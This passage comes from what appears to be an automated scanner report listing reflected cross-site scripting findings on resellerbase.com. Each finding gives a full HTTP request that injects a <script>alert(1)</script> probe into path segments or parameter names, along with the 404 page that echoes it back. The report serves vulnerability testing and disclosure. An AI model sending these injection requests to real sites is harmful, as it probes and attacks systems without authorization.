This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/46/search.php?keyword=search...&Submit3=Search&opt=245792<a>7debffc74b4 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/search.php?keyword=search...&Submit3=Search&opt=245792<a>7debffc74b4 was not found on this server.</p>
...[SNIP]...

2.3280. http://www.resellerbase.com/detail/46/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3bfe6<script>alert(1)</script>538fc7d0b51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail3bfe6<script>alert(1)</script>538fc7d0b51/46/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3bfe6<script>alert(1)</script>538fc7d0b51/46/themes/ was not found on this server.</p>
...[SNIP]...

2.3281. http://www.resellerbase.com/detail/46/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c55ae<script>alert(1)</script>16b30ae5820 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46c55ae<script>alert(1)</script>16b30ae5820/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46c55ae<script>alert(1)</script>16b30ae5820/themes/ was not found on this server.</p>
...[SNIP]...

2.3282. http://www.resellerbase.com/detail/46/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dca51<script>alert(1)</script>2f1f4b42ac was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themesdca51<script>alert(1)</script>2f1f4b42ac/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themesdca51<script>alert(1)</script>2f1f4b42ac/ was not found on this server.</p>
...[SNIP]...

2.3283. http://www.resellerbase.com/detail/46/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9a05c<script>alert(1)</script>a4fc897d5e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/?9a05c<script>alert(1)</script>a4fc897d5e1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/?9a05c<script>alert(1)</script>a4fc897d5e1=1 was not found on this server.</p>
...[SNIP]...

2.3284. http://www.resellerbase.com/detail/46/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5f163<script>alert(1)</script>86cc6a511be was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5f163<script>alert(1)</script>86cc6a511be/46/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5f163<script>alert(1)</script>86cc6a511be/46/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3285. http://www.resellerbase.com/detail/46/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2b564<script>alert(1)</script>2990983e5c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/462b564<script>alert(1)</script>2990983e5c/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/462b564<script>alert(1)</script>2990983e5c/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3286. http://www.resellerbase.com/detail/46/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b525e<script>alert(1)</script>1965f1466ac was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themesb525e<script>alert(1)</script>1965f1466ac/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themesb525e<script>alert(1)</script>1965f1466ac/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3287. http://www.resellerbase.com/detail/46/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 91bae<script>alert(1)</script>180ed4975fd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos91bae<script>alert(1)</script>180ed4975fd/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos91bae<script>alert(1)</script>180ed4975fd/ was not found on this server.</p>
...[SNIP]...

2.3288. http://www.resellerbase.com/detail/46/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c5f10<script>alert(1)</script>a39e3aa881d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/?c5f10<script>alert(1)</script>a39e3aa881d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/?c5f10<script>alert(1)</script>a39e3aa881d=1 was not found on this server.</p>
...[SNIP]...

2.3289. http://www.resellerbase.com/detail/46/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6299d<script>alert(1)</script>38fc1b4be3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail6299d<script>alert(1)</script>38fc1b4be3/46/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail6299d<script>alert(1)</script>38fc1b4be3/46/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3290. http://www.resellerbase.com/detail/46/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e97c6<script>alert(1)</script>0f5abd5eacb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46e97c6<script>alert(1)</script>0f5abd5eacb/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46e97c6<script>alert(1)</script>0f5abd5eacb/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3291. http://www.resellerbase.com/detail/46/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d3bc7<script>alert(1)</script>98234474274 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themesd3bc7<script>alert(1)</script>98234474274/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themesd3bc7<script>alert(1)</script>98234474274/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3292. http://www.resellerbase.com/detail/46/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2c135<script>alert(1)</script>6048f61cfa3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos2c135<script>alert(1)</script>6048f61cfa3/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos2c135<script>alert(1)</script>6048f61cfa3/images/ was not found on this server.</p>
...[SNIP]...

2.3293. http://www.resellerbase.com/detail/46/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ba76a<script>alert(1)</script>74aa0ed5f1e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/imagesba76a<script>alert(1)</script>74aa0ed5f1e/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/imagesba76a<script>alert(1)</script>74aa0ed5f1e/ was not found on this server.</p>
...[SNIP]...

2.3294. http://www.resellerbase.com/detail/46/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b09c0<script>alert(1)</script>d6721498236 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/images/?b09c0<script>alert(1)</script>d6721498236=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/?b09c0<script>alert(1)</script>d6721498236=1 was not found on this server.</p>
...[SNIP]...

2.3295. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 144e8<script>alert(1)</script>453701a1ff6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail144e8<script>alert(1)</script>453701a1ff6/46/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail144e8<script>alert(1)</script>453701a1ff6/46/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3296. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fa4aa<script>alert(1)</script>de212c40f15 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46fa4aa<script>alert(1)</script>de212c40f15/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46fa4aa<script>alert(1)</script>de212c40f15/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3297. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ec2bd<script>alert(1)</script>25c721e6725 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themesec2bd<script>alert(1)</script>25c721e6725/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themesec2bd<script>alert(1)</script>25c721e6725/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3298. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 23498<script>alert(1)</script>dd3b390b98e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos23498<script>alert(1)</script>dd3b390b98e/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos23498<script>alert(1)</script>dd3b390b98e/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3299. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/rating/

Issue detail

